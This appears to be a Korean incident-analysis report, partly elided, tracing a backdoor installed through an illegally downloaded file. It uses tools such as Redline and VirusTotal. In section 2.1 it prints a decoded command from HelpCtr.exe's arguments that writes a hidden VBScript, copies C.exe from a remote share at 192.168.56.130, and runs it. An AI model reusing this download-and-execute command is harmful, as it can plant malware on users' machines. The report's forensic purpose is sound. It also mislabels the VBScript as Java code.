목차

1. 개요
1.1. 목적
1.2. 진단 방법
1.3. 진단 대상

2. 상세 진단 결과
2.1. 문제가 있는 파일 탐색
2.2. 사이트 Redirect
2.3. SR.asx 파일 자동 설치
2.4. 윈도우 미디어 플레이어 실행
2.5. HELPCTR.EXE 실행
2.6. C.exe 파일 다운로드
2.7. Pramfmm.src 파일 생성
2.8. 레지스트리 값 변경

본문내용

1 개요
1.1 목적
- 본 보고서는 사용자의 웹에서 다운로드 된 불법 파일을 통해 PC에 형성된 백도어를 확인하기 위한 분석 과정에 대한 보고서 입니다

1.2 진단 방법
- Redline, virus total 등의 툴을 활용하여 corrected 데이터를 분석하여 침입자의 침입 방법과 경로에 대해 분석하였습니다.

<중 략>

2 상세 진단 결과
2.1 문제가 있는 파일 탐색
- 다양한 Process 중에서 의심스러운 파일을 탐색하는 과정입니다.
- 확인 결과 HelpCtr.exe Process의 Arguments에서 의심스러운 script가 확인되었습니다.
- 상기 script를 URL decoder와 Charcode decoder로 디코딩한 후 하기와 같은 자바 코드를 확인하였습니다.
- cmd /c echo WScript.CreateObject("WScript.Shell").Run"cmd /c copy \\192.168.56.130\w\C.exe %TEMP% && %TEMP%\C.exe",0,false>%TEMP%\fW.vbs|cscript %TEMP%\fW.vbs>nul
- 상기 자바코드를 통해 침입자가 192.168.56.130이라는 ip주소에서 C.exe 파일을 복사해왔다는 전체적인 공격 흐름에 대한 추측이 가능합니다.

참고 자료

없음